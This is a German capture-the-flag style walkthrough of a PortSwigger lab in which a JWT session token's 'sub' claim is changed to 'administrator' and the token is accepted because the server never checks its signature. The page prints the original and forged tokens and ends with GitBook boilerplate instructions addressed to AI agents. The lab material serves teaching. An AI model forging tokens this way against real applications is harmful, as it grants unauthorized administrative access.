> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/web/jwt/jwt-authentication-bypass-via-unverified-signature.md).

# JWT-Authentifizierungsumgehung durch nicht verifizierte Signatur

### JWT-Authentifizierungsumgehung durch nicht verifizierte Signatur

**Lab-Hintergrund**

Dieses Labor verwendet **JSON Web Tokens (JWT)** zur Verwaltung von Benutzersitzungen. / Aufgrund eines kritischen Implementierungsfehlers, **überprüft der Server die Signatur des empfangenen JWT nicht**.

**Ziel:**

* Sitzungstoken bearbeiten, um auf `/admin` das Administrationspanel
* Benutzer löschen **carlos**

**Bereitgestellte Zugangsdaten:**

* `wiener : peter`

**Schritt 1 – Authentifizierung und Wiedererlangung des JWT**

Nach der Verbindung mit dem `wiener` Benutzer wird von der Anwendung ein \*\* JWT\*\*-Sitzungscookie generiert.

Das Token hat die klassische Struktur:

* **Kopfzeile**
* **Payload**
* **Signatur**

{% code overflow="wrap" %}

```bash
eyJraWQiOiI0YTM5NDQ3My0yNmYxLTQxNzMtYjVlOC1hOGQ4NjQ5NmI5ZTEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzUyNzk1Mywic3ViIjoid2llbmVyIn0.T4j1dohfmxoKYLu3Lc9cF03f0jHi1Td_PuIdhpR6jluSxY6UarYiUt0cPDkz6Wt9m0L0f5376ZdnkZvc4afoKcEvU89_cwobse5yU_aEdk4SYVVbuSLEQ-sPlbnIVY5nf17LlU-xxPJZaoii2L-BlGlulIL60j7Mjb9cRs6User-Agentu36YddU2DQkF2Ww2UcTftI6n8S5htcnM5iftGWYLhDkfKsp5RhgV58GCj3kyn92Pxo82DeuUeY-h0YRvOIijlROdSPvufMQiqYbBuUN__6Jb7ckUs7iXOTB6CwBnE-vQcIqQs549YdTOkWypmIQdmGWyUser-AgentbJaPZHOPJU-XLzHwIcg
```

{% endcode %}

<figure><img src="/files/8aa791b9723065e275440de13b14d16c3dd4b076" alt=""><figcaption></figcaption></figure>

**Schritt 2 – Analyse des JWT-Inhalts**

Durch die Dekodierung des JWT sehen wir die folgende Nutzlast:

```json
{
  "iss": "portswigger",
  "exp": 1767531263,
  "sub": "wiener"
}
```

Das `sub` Feld stellt die Identität des authentifizierten Benutzers dar.

<figure><img src="/files/5f0edfc697b6e02f91f38f40aef00970abfb0ea4" alt=""><figcaption></figcaption></figure>

**Schritt 3 – Payload ändern**

Da der Server **die Signatur nicht validiert**, ist es möglich, den Inhalt des Tokens frei zu ändern.

Der Wert von `sub` wird ersetzt:

```json
{
  "iss": "portswigger",
  "exp": 1767531263,
  "sub": "administrator"
}
```

Das JWT wird dann **neu aufgebaut** (unabhängig von der Signatur wird sie nicht überprüft).

{% code overflow="wrap" %}

```bash
eyJraWQiOiJjNDllNjY5Mi1iMDZjLTQ0YjEtYmIwOC0zMjM4NmYxNzA2OGMiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc2NzUzMTI2Mywic3ViIjoiYWRtaW5pc3RyYXRvciJ9.ZpAuSIEN0Ptww1x0aCihPl520xrSpg8D5EWczPJ66pJZFUBq6X8TkSIYD-4-fY1Z9we38SmWLedBi-yF2w8b_XHeICnYPgTM3xrSrallVNukPQfVW-NaCNu_lozTEgBovijP6lMSyJWFXVwddlVh3ixT5_CZW7hK2jnpqcMdBv6RtXW-9nqlkoS_MF7XruVpKFJS8OB71B1juuh3M2c7YpEjCdMRHTW4FOsx8QOxV11udAyU03-JrIxug-SfwmLHLbMPNyUw6midaP_1AFT6s1vLu066AliuMz-HW1ADnWQea3JInM1EFMaY_9oKCZdJ_EyF5oxmdo5ZBl9xPq2Tcw
```

{% endcode %}

<figure><img src="/files/0d4d13397fdaf55a24d3c5c30e8cb78225e11732" alt=""><figcaption></figcaption></figure>

**Schritt 4 – Verwendung eines gefälschten JWT**

Das neue Token wird in das Sitzungscookie des Browsers eingefügt.

Ergebnis:

* Die Anwendung betrachtet den Benutzer als **Administrator**
* Zugriff auf `/admin` ist erlaubt

<figure><img src="/files/d89e7d463e2d4fe1060261e82baa79f83533e2bc" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/web/jwt/jwt-authentication-bypass-via-unverified-signature.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
